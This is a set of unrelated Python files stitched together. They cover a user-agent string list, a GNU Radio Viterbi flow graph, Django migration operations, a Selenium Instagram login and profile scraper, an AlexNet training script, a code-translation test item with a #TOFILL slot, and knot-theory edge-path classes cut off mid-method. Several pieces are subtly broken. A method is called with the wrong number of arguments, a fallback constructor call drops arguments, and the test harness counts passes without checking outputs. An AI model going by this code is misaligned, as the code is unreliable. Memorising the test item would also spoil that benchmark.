'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; MSOCD; AtHomeJP0109)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; Q312461)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; Q312461; T312461)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; T312461)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; T312461; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; T312461; Lunascape 0.99c)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; Unithink)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; telus.net_v5.0.1; Hotbar 4.0)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; telus.net_v5.0.1)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; H010818)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; H010818; CPT-IE401SP1; T312461)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; SenseWave 1.0)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; Suncorp Metway Ltd)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; T312461)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; T312461; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; T312461; Lunascape 0.95a)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; Yahoo! JAPAN Version Windows 95/NT CD-ROM Edition 1.0.)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; (R1 1.1))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; (R1 1.1); (R1 1.3))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; (R1 1.3))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; AIRF)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; FORJEIS55SP1)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; H010818)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Hotbar 3.0; istb 641)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Hotbar 4.1.7.0)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Lunascape 0.98c)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; N_o_k_i_a)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Q312461)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Q312461; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461; Hewle'
)
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Viterbi Equalization
# Generated: Sun Aug 4 08:48:02 2019
##################################################
if __name__ == '__main__':
import ctypes
import sys
if sys.platform.startswith('linux'):
try:
x11 = ctypes.cdll.LoadLibrary('libX11.so')
x11.XInitThreads()
except:
print "Warning: failed to XInitThreads()"
from PyQt4 import Qt
from gnuradio import analog
from gnuradio import blocks
from gnuradio import digital
from gnuradio import eng_notation
from gnuradio import filter
from gnuradio import gr
from gnuradio import qtgui
from gnuradio import trellis, digital
from gnuradio.eng_option import eng_option
from gnuradio.filter import firdes
from gnuradio.qtgui import Range, RangeWidget
from grc_gnuradio import blks2 as grc_blks2
from optparse import OptionParser
import gnuradio.trellis.fsm_utils as fu
import math
import numpy
import sip
import sys
class viterbi_equalization(gr.top_block, Qt.QWidget):
def __init__(self):
gr.top_block.__init__(self, "Viterbi Equalization")
Qt.QWidget.__init__(self)
self.setWindowTitle("Viterbi Equalization")
try:
self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))
except:
pass
self.top_scroll_layout = Qt.QVBoxLayout()
self.setLayout(self.top_scroll_layout)
self.top_scroll = Qt.QScrollArea()
self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)
self.top_scroll_layout.addWidget(self.top_scroll)
self.top_scroll.setWidgetResizable(True)
self.top_widget = Qt.QWidget()
self.top_scroll.setWidget(self.top_widget)
self.top_layout = Qt.QVBoxLayout(self.top_widget)
self.top_grid_layout = Qt.QGridLayout()
self.top_layout.addLayout(self.top_grid_layout)
self.settings = Qt.QSettings("GNU Radio", "viterbi_equalization")
self.restoreGeometry(self.settings.value("geometry").toByteArray())
##################################################
# Variables
##################################################
self.modulation = modulation = fu.pam4
self.channel = channel = fu.c_channel
self.tot_mod = tot_mod = fu.make_isi_lookup(modulation,channel,False)
self.fsm = fsm = trellis.fsm(len(modulation[1]),len(channel))
self.bpsym = bpsym = int(round(math.log(fsm.I())/math.log(2)))
self.EsN0_dB = EsN0_dB = 2
self.Es = Es = numpy.mean((numpy.square(numpy.abs(tot_mod[1]))))
self.noisevar = noisevar = 10**(-EsN0_dB/10.0) * Es /2.0
self.block = block = bpsym*1000
self.R = R = 100e3
##################################################
# Blocks
##################################################
self.trellis_viterbi_combined_xx_0 = trellis.viterbi_combined_fb(trellis.fsm(fsm), block/bpsym, -1, -1, tot_mod[0], (tot_mod[1]), digital.TRELLIS_EUCLIDEAN)
self.qtgui_number_sink_0 = qtgui.number_sink(
gr.sizeof_float,
0,
qtgui.NUM_GRAPH_HORIZ,
1
)
self.qtgui_number_sink_0.set_update_time(0.10)
self.qtgui_number_sink_0.set_title("BER")
labels = ['BER', '', '', '', '',
'', '', '', '', '']
units = ['', '', '', '', '',
'', '', '', '', '']
colors = [("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"),
("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black")]
factor = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
for i in xrange(1):
self.qtgui_number_sink_0.set_min(i, 0)
self.qtgui_number_sink_0.set_max(i, 1)
self.qtgui_number_sink_0.set_color(i, colors[i][0], colors[i][1])
if len(labels[i]) == 0:
self.qtgui_number_sink_0.set_label(i, "Data {0}".format(i))
else:
self.qtgui_number_sink_0.set_label(i, labels[i])
self.qtgui_number_sink_0.set_unit(i, units[i])
self.qtgui_number_sink_0.set_factor(i, factor[i])
self.qtgui_number_sink_0.enable_autoscale(False)
self._qtgui_number_sink_0_win = sip.wrapinstance(self.qtgui_number_sink_0.pyqwidget(), Qt.QWidget)
self.top_layout.addWidget(self._qtgui_number_sink_0_win)
self.fir_filter_xxx_0 = filter.fir_filter_fff(1, (fu.c_channel))
self.fir_filter_xxx_0.declare_sample_delay(0)
self.digital_chunks_to_symbols_xx_0_0 = digital.chunks_to_symbols_bf((modulation[1]), modulation[0])
self.blocks_unpack_k_bits_bb_0 = blocks.unpack_k_bits_bb(bpsym)
self.blocks_throttle_0 = blocks.throttle(gr.sizeof_char*1, R,True)
self.blocks_pack_k_bits_bb_0 = blocks.pack_k_bits_bb(bpsym)
self.blocks_null_sink_1 = blocks.null_sink(gr.sizeof_float*1)
self.blocks_add_xx_1 = blocks.add_vff(1)
self.blks2_error_rate_0 = grc_blks2.error_rate(
type='BER',
win_size=block*100,
bits_per_symbol=1,
)
self.analog_random_source_x_0 = blocks.vector_source_b(map(int, numpy.random.randint(0, 2, 1007)), True)
self.analog_noise_source_x_0 = analog.noise_source_f(analog.GR_GAUSSIAN, noisevar**0.5, -42)
self._EsN0_dB_range = Range(-10, 30, 1, 2, 200)
self._EsN0_dB_win = RangeWidget(self._EsN0_dB_range, self.set_EsN0_dB, 'Es/N0 (dB)', "counter_slider", float)
self.top_layout.addWidget(self._EsN0_dB_win)
##################################################
# Connections
##################################################
self.connect((self.analog_noise_source_x_0, 0), (self.blocks_add_xx_1, 1))
self.connect((self.analog_random_source_x_0, 0), (self.blks2_error_rate_0, 0))
self.connect((self.analog_random_source_x_0, 0), (self.blocks_throttle_0, 0))
self.connect((self.blks2_error_rate_0, 0), (self.qtgui_number_sink_0, 0))
self.connect((self.blocks_add_xx_1, 0), (self.blocks_null_sink_1, 0))
self.connect((self.blocks_add_xx_1, 0), (self.trellis_viterbi_combined_xx_0, 0))
self.connect((self.blocks_pack_k_bits_bb_0, 0), (self.digital_chunks_to_symbols_xx_0_0, 0))
self.connect((self.blocks_throttle_0, 0), (self.blocks_pack_k_bits_bb_0, 0))
self.connect((self.blocks_unpack_k_bits_bb_0, 0), (self.blks2_error_rate_0, 1))
self.connect((self.digital_chunks_to_symbols_xx_0_0, 0), (self.fir_filter_xxx_0, 0))
self.connect((self.fir_filter_xxx_0, 0), (self.blocks_add_xx_1, 0))
self.connect((self.trellis_viterbi_combined_xx_0, 0), (self.blocks_unpack_k_bits_bb_0, 0))
def closeEvent(self, event):
self.settings = Qt.QSettings("GNU Radio", "viterbi_equalization")
self.settings.setValue("geometry", self.saveGeometry())
event.accept()
def get_modulation(self):
return self.modulation
def set_modulation(self, modulation):
self.modulation = modulation
self.set_tot_mod(fu.make_isi_lookup(self.modulation,self.channel,False))
self.set_fsm(trellis.fsm(len(self.modulation[1]),len(self.channel)))
self.digital_chunks_to_symbols_xx_0_0.set_symbol_table((self.modulation[1]))
def get_channel(self):
return self.channel
def set_channel(self, channel):
self.channel = channel
self.set_tot_mod(fu.make_isi_lookup(self.modulation,self.channel,False))
self.set_fsm(trellis.fsm(len(self.modulation[1]),len(self.channel)))
def get_tot_mod(self):
return self.tot_mod
def set_tot_mod(self, tot_mod):
self.tot_mod = tot_mod
self.trellis_viterbi_combined_xx_0.set_D(self.tot_mod[0])
self.trellis_viterbi_combined_xx_0.set_TABLE((self.tot_mod[1]))
self.set_Es(numpy.mean((numpy.square(numpy.abs(self.tot_mod[1])))))
def get_fsm(self):
return self.fsm
def set_fsm(self, fsm):
self.fsm = fsm
self.trellis_viterbi_combined_xx_0.set_FSM(trellis.fsm(self.fsm))
def get_bpsym(self):
return self.bpsym
def set_bpsym(self, bpsym):
self.bpsym = bpsym
self.set_block(self.bpsym*1000)
self.trellis_viterbi_combined_xx_0.set_K(self.block/self.bpsym)
def get_EsN0_dB(self):
return self.EsN0_dB
def set_EsN0_dB(self, EsN0_dB):
self.EsN0_dB = EsN0_dB
self.set_noisevar(10**(-self.EsN0_dB/10.0) * self.Es /2.0)
def get_Es(self):
return self.Es
def set_Es(self, Es):
self.Es = Es
self.set_noisevar(10**(-self.EsN0_dB/10.0) * self.Es /2.0)
def get_noisevar(self):
return self.noisevar
def set_noisevar(self, noisevar):
self.noisevar = noisevar
self.analog_noise_source_x_0.set_amplitude(self.noisevar**0.5)
def get_block(self):
return self.block
def set_block(self, block):
self.block = block
self.trellis_viterbi_combined_xx_0.set_K(self.block/self.bpsym)
def get_R(self):
return self.R
def set_R(self, R):
self.R = R
self.blocks_throttle_0.set_sample_rate(self.R)
def main(top_block_cls=viterbi_equalization, options=None):
from distutils.version import StrictVersion
if StrictVersion(Qt.qVersion()) >= StrictVersion("4.5.0"):
style = gr.prefs().get_string('qtgui', 'style', 'raster')
Qt.QApplication.setGraphicsSystem(style)
qapp = Qt.QApplication(sys.argv)
tb = top_block_cls()
tb.start()
tb.show()
def quitting():
tb.stop()
tb.wait()
qapp.connect(qapp, Qt.SIGNAL("aboutToQuit()"), quitting)
qapp.exec_()
if __name__ == '__main__':
main()
|
<filename>exo_changelog/operations.py
from django.db.migrations.operations.base import Operation
from django.db import DEFAULT_DB_ALIAS, connections
class RunSQL(Operation):
"""
Runs some raw SQL. A reverse SQL statement may be provided.
Also accepts a list of operations that represent the state change effected
by this SQL change, in case it's custom column/table creation/deletion.
"""
noop = ''
def __init__(self, sql, reverse_sql=None, state_operations=None, hints=None, elidable=False):
self.sql = sql
self.reverse_sql = reverse_sql
self.state_operations = state_operations or []
self.hints = hints or {}
self.elidable = elidable
self.connection = connections[DEFAULT_DB_ALIAS]
def deconstruct(self):
kwargs = {
'sql': self.sql,
}
if self.reverse_sql is not None:
kwargs['reverse_sql'] = self.reverse_sql
if self.state_operations:
kwargs['state_operations'] = self.state_operations
if self.hints:
kwargs['hints'] = self.hints
return (
self.__class__.__name__,
[],
kwargs
)
@property
def reversible(self):
return self.reverse_sql is not None
def state_forwards(self, app_label, state):
for state_operation in self.state_operations:
state_operation.state_forwards(app_label, state)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
self._run_sql(self.sql)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
if self.reverse_sql is None:
raise NotImplementedError('You cannot reverse this operation')
self._run_sql(self.reverse_sql)
def describe(self):
return 'Raw SQL operation'
def _run_sql(self, schema_editor, sqls):
with self.connection.schema_editor() as schema_editor:
if isinstance(sqls, (list, tuple)):
for sql in sqls:
params = None
if isinstance(sql, (list, tuple)):
elements = len(sql)
if elements == 2:
sql, params = sql
else:
raise ValueError('Expected a 2-tuple but got %d' % elements)
schema_editor.execute(sql, params=params)
elif sqls != RunSQL.noop:
statements = schema_editor.connection.ops.prepare_sql_script(sqls)
for statement in statements:
schema_editor.execute(statement, params=None)
class RunPython(Operation):
"""
Runs Python code in a context suitable for doing versioned ORM operations.
"""
reduces_to_sql = False
def __init__(self, code, reverse_code=None, atomic=None, hints=None, elidable=False):
self.atomic = atomic
# Forwards code
if not callable(code):
raise ValueError('RunPython must be supplied with a callable')
self.code = code
# Reverse code
if reverse_code is None:
self.reverse_code = None
else:
if not callable(reverse_code):
raise ValueError('RunPython must be supplied with callable arguments')
self.reverse_code = reverse_code
self.hints = hints or {}
self.elidable = elidable
def deconstruct(self):
kwargs = {
'code': self.code,
}
if self.reverse_code is not None:
kwargs['reverse_code'] = self.reverse_code
if self.atomic is not None:
kwargs['atomic'] = self.atomic
if self.hints:
kwargs['hints'] = self.hints
return (
self.__class__.__name__,
[],
kwargs
)
@property
def reversible(self):
return self.reverse_code is not None
def state_forwards(self, app_label, state):
# RunPython objects have no state effect. To add some, combine this
# with SeparateDatabaseAndState.
pass
def database_forwards(self, app_label, schema_editor, from_state, to_state):
# RunPython has access to all models. Ensure that all models are
# reloaded in case any are delayed.
from_state.clear_delayed_apps_cache()
self.code()
def database_backwards(self, app_label, schema_editor, from_state, to_state):
if self.reverse_code is None:
raise NotImplementedError('You cannot reverse this operation')
self.reverse_code()
def describe(self):
return 'Raw Python operation'
@staticmethod
def noop(apps, schema_editor):
return None
|
import selenium
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from webdriver_manager.chrome import ChromeDriverManager
ratelimited=False
def login(username,password):
global browser
global ratelimited
browser = webdriver.Chrome(ChromeDriverManager().install())
browser.get('https://www.instagram.com')
browser.implicitly_wait(1)
try:
userinput = browser.find_elements_by_css_selector('form input')[0]
passwordinput = browser.find_elements_by_css_selector('form input')[1]
userinput.send_keys(username)
passwordinput.send_keys(password)
passwordinput.send_keys(Keys.ENTER)
time.sleep(3)
browser.implicitly_wait(1)
try:
notification = browser.find_element_by_class_name('cmbtv')
notification.click()
except selenium.common.exceptions.NoSuchElementException:
print(
"Instagram has ratelimied you(only lasts like 10 minutes), you can try a VPN or a different account, I will try find a work around this in BetterInstagram 0.0.1+")
ratelimited = True
return
except IndexError:
browser.quit()
login(username, password)
def getuser(username):
global browser
global ratelimited
if ratelimited:
return
userinfo={}
span=[]
#Username
userinfo["username"] = username
#Setup for no login call
try:
browser.get(f'https://www.instagram.com/{username}')
except NameError:
browser = webdriver.Chrome(ChromeDriverManager().install())
browser.get(f'https://www.instagram.com/{username}')
#Name & Setup
try:
name = browser.find_element_by_class_name("rhpdm")
userinfo["name"]=name.text
except selenium.common.exceptions.NoSuchElementException:
if browser.current_url=='https://www.instagram.com/accounts/login/':
print("it seems instagram is forcing a login for this URL.")
return
else:
userinfo["name"] = ''
# #Bio Placeholder
userinfo["biography"]=""
#Number Info
headinfo = browser.find_elements_by_class_name("g47SY")
userinfo["posts"]=headinfo[0].text
userinfo["followers"] = headinfo[1].text
userinfo["following"] = headinfo[2].text
#Verified
try:
isverified=browser.find_element_by_class_name("mTLOB")
except selenium.common.exceptions.NoSuchElementException:
isverified=False
try:
if isverified.text=="Verified":
isverified=True
except AttributeError:
pass
userinfo["is_verified"]=isverified
#Website
try:
website=browser.find_element_by_class_name("yLUwa")
except selenium.common.exceptions.NoSuchElementException:
website= None
try:
userinfo["website"]=website.text
except AttributeError:
userinfo["website"] = website
#You are following
try:
youarefollowing=browser.find_element_by_class_name("_5f5mN")
except selenium.common.exceptions.NoSuchElementException:
youarefollowing = browser.find_element_by_class_name("sqdOP")
if youarefollowing.text == "Follow":
youarefollowing=False
else:
youarefollowing=True
userinfo["are_you_following"]=youarefollowing
#URL
userinfo["url"]=browser.current_url
#Bio
bio=browser.find_elements_by_tag_name("span")
biocount=0
for x in bio:
span.append(str(x.text))
while biocount<10:
for i in span:
if i == userinfo["posts"]:
span.remove(i)
if i == userinfo["followers"]:
span.remove(i)
if i == userinfo["following"]:
span.remove(i)
if i == f'{userinfo["posts"]} posts':
span.remove(i)
if i == '':
span.remove(i)
if i == 'Verified':
span.remove(i)
if i == 'Follow':
span.remove(i)
biocount+=1
if span[0]=='POSTS' or span[0][:12]=='Followed by ':
span[0]=""
userinfo["biography"]=span[0]
return userinfo |
"""
Written by <NAME> - 2017
models training on ImageNet
"""
import argparse
import os.path
import time
import tensorflow as tf
import tensorflow.contrib.eager as tfe
from models.alexnet import AlexNet
from data import ImageNetDataset
from config import Configuration
import utils as ut
tfe.enable_eager_execution()
class Trainer(object):
def __init__(self, cfg, net, trainingset, valset, resume):
self.cfg = cfg
self.net = net
self.trainingset = trainingset
self.valset = valset
#self.optimizer = tf.train.AdamOptimizer(learning_rate=self.cfg.LEARNING_RATE)
self.optimizer = tf.train.MomentumOptimizer(learning_rate=self.cfg.LEARNING_RATE, momentum=self.cfg.MOMENTUM)
self.global_step = tf.train.get_or_create_global_step()
self.epoch = tfe.Variable(0, name='epoch', dtype=tf.float32, trainable=False)
self.writer = tf.contrib.summary.create_summary_file_writer(self.cfg.SUMMARY_PATH)
self.all_variables = (self.net.variables
+ self.optimizer.variables()
+ [self.global_step]
+ [self.epoch])
if resume:
tfe.Saver(self.all_variables).restore(tf.train.latest_checkpoint(self.cfg.CKPT_PATH))
def loss(self, mode, x, y):
"""
Computes the loss for a given batch of examples
Args:
mode, string 'train' or 'val'
x, tf tensor representing a batch of images
y, tf tensor representing a batch of labels
Returns:
the loss between the predictions on the images and the groundtruths
"""
pred = self.net(x)
loss_value = tf.losses.softmax_cross_entropy(onehot_labels=y, logits=pred)
weight_decay = tf.reduce_sum(self.cfg.LAMBDA * tf.stack([tf.nn.l2_loss(v) for v in self.net.variables]))
total_loss = loss_value + weight_decay
tf.contrib.summary.scalar(mode + '/loss', total_loss)
return total_loss
def accuracy(self, mode, x, y):
"""
Computes the accuracy for a given batch of examples
Args:
mode, string 'train' or 'val'
x, tf tensor representing a batch of images
y, tf tensor representing a batch of labels
Returns:
the accuracy of the predictions on the images and the groundtruths
"""
pred = tf.nn.softmax(self.net(x))
accuracy_value = tf.reduce_sum(
tf.cast(
tf.equal(
tf.argmax(pred, axis=1, output_type=tf.int64),
tf.argmax(y, axis=1, output_type=tf.int64)
),
dtype=tf.float32
)
) / float(pred.shape[0].value)
tf.contrib.summary.scalar(mode +'/accuracy', accuracy_value)
return accuracy_value
def train(self):
"""
Training procedure
"""
start_time = time.time()
step_time = 0.0
with self.writer.as_default():
with tf.contrib.summary.record_summaries_every_n_global_steps(self.cfg.DISPLAY_STEP):
for e in range(self.epoch.numpy(), self.cfg.EPOCHS):
tf.assign(self.epoch, e)
for (batch_i, (images, labels)) in enumerate(tfe.Iterator(self.trainingset.dataset)):
self.global_step = tf.train.get_global_step()
step = self.global_step.numpy() + 1
step_start_time = int(round(time.time() * 1000))
self.optimizer.minimize(lambda: self.loss('train', images, labels), global_step=self.global_step)
step_end_time = int(round(time.time() * 1000))
step_time += step_end_time - step_start_time
if (step % self.cfg.DISPLAY_STEP) == 0:
l = self.loss('train', images, labels)
a = self.accuracy('train', images, labels).numpy()
print ('Epoch: {:03d} Step/Batch: {:09d} Step mean time: {:04d}ms \nLoss: {:.7f} Training accuracy: {:.4f}'.format(e, step, int(step_time / step), l, a))
if (step % self.cfg.VALIDATION_STEP) == 0:
val_images, val_labels = tfe.Iterator(self.valset.dataset).next()
l = self.loss('val', val_images, val_labels)
a = self.accuracy('val', val_images, val_labels).numpy()
int_time = time.time() - start_time
print ('Elapsed time: {} --- Loss: {:.7f} Validation accuracy: {:.4f}'.format(ut.format_time(int_time), l, a))
if (step % self.cfg.SAVE_STEP) == 0:
tfe.Saver(self.all_variables).save(os.path.join(self.cfg.CKPT_PATH, 'net.ckpt'), global_step=self.global_step)
print('Variables saved')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--resume', help='Resume the training from the last checkpoint', action='store_true')
args = parser.parse_args()
cfg = Configuration()
net = AlexNet(cfg, training=True)
trainingset = ImageNetDataset(cfg, 'train')
valset = ImageNetDataset(cfg, 'val')
if not os.path.exists(cfg.CKPT_PATH):
os.makedirs(cfg.CKPT_PATH)
if tfe.num_gpus() > 0:
with tf.device('/gpu:0'):
trainer = Trainer(cfg, net, trainingset, valset, args.resume)
trainer.train()
else:
trainer = Trainer(cfg, net, args.resume)
trainer.train() |
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
def f_gold ( arr , n ) :
found = False
for i in range ( n - 1 ) :
s = set ( )
for j in range ( i + 1 , n ) :
x = - ( arr [ i ] + arr [ j ] )
if x in s :
print ( x , arr [ i ] , arr [ j ] )
found = True
else :
s.add ( arr [ j ] )
if found == False :
print ( "No Triplet Found" )
#TOFILL
if __name__ == '__main__':
param = [
([1, 7, 12, 18, 18, 25, 26, 28, 29, 33, 33, 37, 39, 39, 53, 54, 55, 59, 61, 63, 63, 65, 66, 68, 68, 71, 71, 77, 81, 85, 90, 93, 94, 95, 97],18,),
([38, 68, 16, 96, -10, 6, 86, -42, -66, -2, -10, 48, 16, -28, 92, -24, 0, 46, -58, -58, 56, -70, 10, -2, -92, -80, 14, -78, 16, -84, -88, 42, -24, 6, 86, 82, 84],19,),
([0, 0, 0, 0, 1, 1, 1, 1],6,),
([45],0,),
([-80, -68, -54, -44, -40, -38, -32, -28, -22, -18, -12, -10, 14, 24, 38, 38, 40, 42, 46, 46, 64, 64, 66, 68, 68, 68, 70, 96],20,),
([0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0],13,),
([1, 3, 4, 6, 8, 9, 10, 10, 11, 17, 17, 21, 22, 22, 25, 32, 34, 38, 46, 46, 48, 51, 58, 59, 62, 63, 64, 65, 70, 70, 72, 72, 72, 74, 77, 78, 81, 82, 83, 89, 90, 92, 95, 97],43,),
([-70, 78, 70, 20, -52, 36, -42, 34, -56, -94],9,),
([0, 0, 0, 0, 1, 1, 1, 1, 1],7,),
([72, 50, 10, 44, 66, 67, 76, 19, 3, 24, 76, 56, 53, 42, 15, 50, 86, 43, 77, 28, 42, 65, 92, 73, 60, 86, 52, 65],21,)
]
filled_function_param = [
([1, 7, 12, 18, 18, 25, 26, 28, 29, 33, 33, 37, 39, 39, 53, 54, 55, 59, 61, 63, 63, 65, 66, 68, 68, 71, 71, 77, 81, 85, 90, 93, 94, 95, 97],18,),
([38, 68, 16, 96, -10, 6, 86, -42, -66, -2, -10, 48, 16, -28, 92, -24, 0, 46, -58, -58, 56, -70, 10, -2, -92, -80, 14, -78, 16, -84, -88, 42, -24, 6, 86, 82, 84],19,),
([0, 0, 0, 0, 1, 1, 1, 1],6,),
([45],0,),
([-80, -68, -54, -44, -40, -38, -32, -28, -22, -18, -12, -10, 14, 24, 38, 38, 40, 42, 46, 46, 64, 64, 66, 68, 68, 68, 70, 96],20,),
([0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0],13,),
([1, 3, 4, 6, 8, 9, 10, 10, 11, 17, 17, 21, 22, 22, 25, 32, 34, 38, 46, 46, 48, 51, 58, 59, 62, 63, 64, 65, 70, 70, 72, 72, 72, 74, 77, 78, 81, 82, 83, 89, 90, 92, 95, 97],43,),
([-70, 78, 70, 20, -52, 36, -42, 34, -56, -94],9,),
([0, 0, 0, 0, 1, 1, 1, 1, 1],7,),
([72, 50, 10, 44, 66, 67, 76, 19, 3, 24, 76, 56, 53, 42, 15, 50, 86, 43, 77, 28, 42, 65, 92, 73, 60, 86, 52, 65],21,)
]
n_success = 0
for i, parameters_set in enumerate(param):
f_filled(*(filled_function_param[i]))
f_gold(*parameters_set)
if parameters_set == filled_function_param[i]:
n_success+=1
print("#Results: %i, %i" % (n_success, len(param))) |
# Written by <NAME> <<EMAIL>>
#
# Version 1.0. Dec 4, 1998.
# Version 1.3 Nov 14, 2020. Made work with Python 3.*
from gcd_tools import *
# The following two classes are used to store the vertices of an edge
# path. The first is denoted <p/q> in the paper. I will try to
# insure that q is always > 0, and the gcd(p,q) = 1.
@total_ordering
class vertex_of_D:
# can take either a fraction or a pair of integers
def __init__(self, p, q="noarg"):
if q == "noarg":
self.frac = p.copy()
else:
self.frac = frac(p,q)
def __repr__(self):
return "<%s>" % self.frac
def __eq__(self, other):
if not isinstance(other, vertex_of_D):
return False
return self.frac == other.frac
def __lt__(self, other):
if not isinstance(other, vertex_of_D):
raise ValueError
return self.frac < other.frac
def p(self):
return self.frac.t
def q(self):
return self.frac.b
def u(self):
return frac(self.frac.b - 1, self.frac.b)
def v(self):
return self.frac.copy()
# min num of arcs needed to realize this diagram
def num_arcs(self):
return 1
# returns the corresponding fraction in the collasped diagram with
# only three vert.
def reduced(self):
return frac(self.frac.t % 2, self.frac.b % 2)
# finds the two leftward neighbors of a vertex of T
def leftward_neighbors(self):
# The two vertices to the left of <p/q> are <r/s>
# where sp - rq = +/-1 and s < q
p, q = self.frac.t, self.frac.b
g, s, r = euclidean_algorithm(p, q) # 1 = sp + rq
if g != 1 or q <= 1: raise ValueError("bad vertex %i,%i" % (p,q))
# change so sp - rq = +/-1 and r > 0
r = -r
if r < 0: r, s = -r, -s
# all solutions of s'p - r'q = +/-1 are of form
# s' = (s + aq), r = (r + aq)
a = -s//q
# return so that the vertex with larger v coordinate is second
ret = [vertex_of_D (r + a*p, s + a*q), vertex_of_D (r + (a + 1)*p, s + (a + 1)*q)]
if ret[0] > ret[1]:
ret.reverse()
return ret
# the second kind of vertex in an edge path is k/m <p/q> + (m - k)/m <r/s>.
class interior_of_edge_of_D:
# takes three fractions to define -- k/m must be between 0 and 1
def __init__(self, pq, rs, km):
self.pq = pq.copy()
self.rs = rs.copy()
self.km = km.copy()
if not 0 <= km <= 1:
raise ValueError("need 0 <= km <=1")
def p(self):
return self.pq.t
def q(self):
return self.pq.b
def r(self):
return self.rs.t
def s(self):
return self.rs.b
def __repr__(self):
return "%s<%s> + %s<%s>" % (self.km, self.pq, 1 - self.km, self.rs)
def __eq__(self, o):
if not isinstance(o, interior_of_edge_of_D):
return False
return self.pq == o.pq and self.rs == o.rs and self.km == o.km
# min num arcs needed to realize system
def num_arcs(self):
if self.pq == self.rs:
return self.km.t
return self.km.b
# Decides if two vertices of D are joined by an edge
def joined_by_edge(v, w):
if (not isinstance(v, vertex_of_D)) or (not isinstance(w, vertex_of_D)): raise TypeError
return abs(v.p() * w.q() - v.q()*w.p()) == 1
class edgepath:
def __init__(self, tangle_num, given_path):
self.tangle = tangle_num # which tangle this is an edge path for
self.path = given_path # list of vertices from left to right
self.r_value = self.compute_final_r_value()
self.completely_reversible = self.decide_reversibility()
def __getitem__(self, i): return self.path[i]
def __len__(self): return len(self.path)
def __repr__(self):
return "tangle: %i, r = %i, cr = %i, %s" % (self.tangle,
self.r_value, self.completely_reversible, self.path)
def compute_final_r_value(self):
path = self.path
if len(path) <= 1: return 0
p, q = path[0].p(), path[0].q()
r, s = path[1].p(), path[1].q()
# using that <p, q> has (u,v) coordinates ( (q - 1)/q, p/q ) its
# easy to calculate that the intersection of the line through <p,
# q> and <r, s> with the right edge of T (u = 1) is given by:
# (p - r)/(q - s)
rr = frac(p -r, q -s).b
if p*s < q*r: rr = -rr
return rr
def decide_reversibility(self):
path = self.path
# determine if path is completely reversible. This is the case if
# for each pair of successive segments of the path lie on
# triangles of D sharing a common face.
if len(path) <=2: return 1
# change leftmost segment if necessary
if isinstance(path[0], interior_of_edge_of_D):
path = [vertex_of_D(path[0].p(), path[0].q())] + path[1:]
for i in range(2, len(path)):
for v in path[i].leftward_neighbors():
if not joined_by_edge(v, path[i - 2]): return 0
return 1
def twist(self):
# Formula for twist is tau = 2 ( down - up ) where down is the
# number of edges which derease slope and up is the number
# which increase slope.
tau = 0
path = self.path
if len(path) <= 1: return 0
# iterate over each edge [v, w]
for i in range(0, len(path) - 1):
v, w = path[i], path[i+1]
# fractional twist possible for final edge
if i == 0 and isinstance(v, interior_of_edge_of_D):
if v.pq < v.rs:
tau = tau + 2*v.km
else:
tau = tau - 2*v.km
else:
